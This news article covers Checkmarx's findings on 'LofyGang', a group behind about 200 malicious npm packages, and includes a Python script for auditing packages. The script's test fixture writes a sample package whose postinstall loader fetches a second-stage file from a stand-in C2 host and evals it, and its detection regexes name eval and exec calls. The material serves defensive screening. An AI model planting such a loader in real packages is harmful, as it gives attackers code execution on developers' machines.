A number of notable software supply chain cyber incidents have been linked to ‘LofyGang,’ an attack group that has been operating for over a year, according to a new analysis by Checkmarx.
The researchers discovered around 200 malicious packages with thousands of installations linked to LofyGang. These included several classes of malicious payloads, general password stealers and Discord-specific persistent malware.
“Some were embedded inside the package, and some downloaded the malicious payload during runtime from C2 servers,” stated Checkmarx.
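The two delivery patterns Checkmarx describes, a payload shipped inside the package and a payload fetched from a C2 server at runtime, both leave static traces that a defender can check for before a package is trusted. The following audit script is an added example written for this article, not Checkmarx tooling or anything from the LofyGang packages; the heuristic patterns, the severity labels and the sample package it builds (including the `c2.example.invalid` URL) are all constructed for illustration.

```python
"""Static audit of an unpacked npm package for install-time hooks and for
the "fetch remote code, then execute it" shape. Example code added for this
article; heuristics and the sample package are constructed, not from the report."""
import json
import re
import tempfile
from pathlib import Path

# Lifecycle hooks that npm runs automatically during `npm install`; a
# payload embedded in the package is commonly triggered from one of these.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed indicators: an outbound fetch combined with dynamic code execution is
# the classic runtime-download-from-C2 shape described in the article.
NETWORK_RE = re.compile(r"\b(?:https?\.get|https?\.request|fetch|axios\.get)\s*\(")
DYN_EXEC_RE = re.compile(
    r"\b(?:eval|new Function|vm\.runInThisContext|child_process\.exec|exec|spawn)\s*\("
)
REMOTE_URL_RE = re.compile(r"https?://[\w.-]+(?:/[^\s'\"`]*)?")


def audit_package(pkg_dir):
    """Return a list of (severity, location, description) findings for one package."""
    pkg_dir = Path(pkg_dir)
    findings = []

    manifest_path = pkg_dir / "package.json"
    if manifest_path.is_file():
        manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        scripts = manifest.get("scripts", {})
        for hook in INSTALL_HOOKS:
            if hook in scripts:
                findings.append(
                    ("high", "package.json", f"install-time hook '{hook}': {scripts[hook]}")
                )

    for path in sorted(pkg_dir.rglob("*.js")):
        src = path.read_text(encoding="utf-8", errors="replace")
        rel = str(path.relative_to(pkg_dir))
        has_net = bool(NETWORK_RE.search(src))
        has_exec = bool(DYN_EXEC_RE.search(src))
        if has_net and has_exec:
            findings.append(("high", rel, "remote fetch combined with dynamic code execution"))
        elif has_exec:
            findings.append(("medium", rel, "dynamic code execution (possible embedded payload)"))
        elif has_net:
            findings.append(("low", rel, "outbound network call"))
        for url in REMOTE_URL_RE.findall(src):
            findings.append(("info", rel, f"hard-coded remote URL: {url}"))
    return findings


def build_sample_package():
    """Write a constructed package showing both patterns to a temp dir; return its path."""
    root = Path(tempfile.mkdtemp(prefix="pkg-audit-"))
    (root / "package.json").write_text(json.dumps({
        "name": "example-discord-helper",  # constructed name, not a real package
        "version": "1.0.0",
        "scripts": {"postinstall": "node setup.js"},
    }), encoding="utf-8")
    # Constructed stage-one loader: fetch a second stage and eval it.
    (root / "setup.js").write_text(
        "const https = require('https');\n"
        "https.get('https://c2.example.invalid/stage2.js', r => {\n"
        "  let d = ''; r.on('data', c => d += c); r.on('end', () => eval(d));\n"
        "});\n",
        encoding="utf-8",
    )
    # Benign module that should produce no finding.
    (root / "index.js").write_text("module.exports = () => 'hello';\n", encoding="utf-8")
    return root


if __name__ == "__main__":
    for severity, location, description in audit_package(build_sample_package()):
        print(f"[{severity}] {location}: {description}")
```

Run it against a directory under `node_modules` (or an extracted `npm pack` tarball) to triage a dependency. The script is a screening aid only: legitimate packages do use install hooks and `child_process`, so a "high" finding is a prompt to read the flagged file, not a verdict.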
Some of those packages had already been recorded in three separate incident reports this year by Sonatype, JFrog and Securelist. However, “that was just a small piece of this larger puzzle.”
By observing LofyGang’s activities across the internet, the Checkmarx team concluded it was an organized crime group focused on stealing and sharing stolen credit card data, gaming and streaming accounts (e.g., Disney) and more.
The investigation looked at LofyGang’s Discord server, which was created on October 31, 2021. This communication channel includes technical support for the group's hacking tools, a dark meme group and a dedicated bot responsible for a giveaway of Discord Nitro updates.
It also hosts hacking tools under the GitHub account 'PolarLofy,' whose open-source repositories offer tools and bots for Discord.
The researchers observed LofyGang operators posting to an underground hacking community under the alias 'DyPolarLofy,' where they leak thousands of Disney+ and Minecraft accounts and promote their hacking tools and bots.
LofyGang even has its own YouTube channel, where it promotes content such as demonstrating how to use its hacking tools.
The researchers believe the group’s origin is Brazil due to the use of Brazilian Portuguese sentences and the discovery of a file called ‘brazil.js,’ which contained malware found in a few of its malicious packages.
In September 2022, Sonatype revealed it had detected a 700% rise in malicious packages in various open-source repositories over the past year. In the same month, the Microsoft Threat Intelligence Center (MSTIC) published an advisory stating that threat actors associated with North Korea had been spotted weaponizing legitimate open-source software targeting employees in organizations across multiple industries.
Checkmarx concluded: “The surge of recent open-source supply chain attacks teaches us that cyber-attackers have realized that abusing the open-source ecosystem represents an easy way to increase the effectiveness of their attacks. Communities are being formed around utilizing open-source software for malicious purposes. We believe this is the start of a trend that will increase in the coming months.”
Checkmarx added that it had disclosed its findings to the security teams of GitHub, NPM, Repl.it, Discord and more.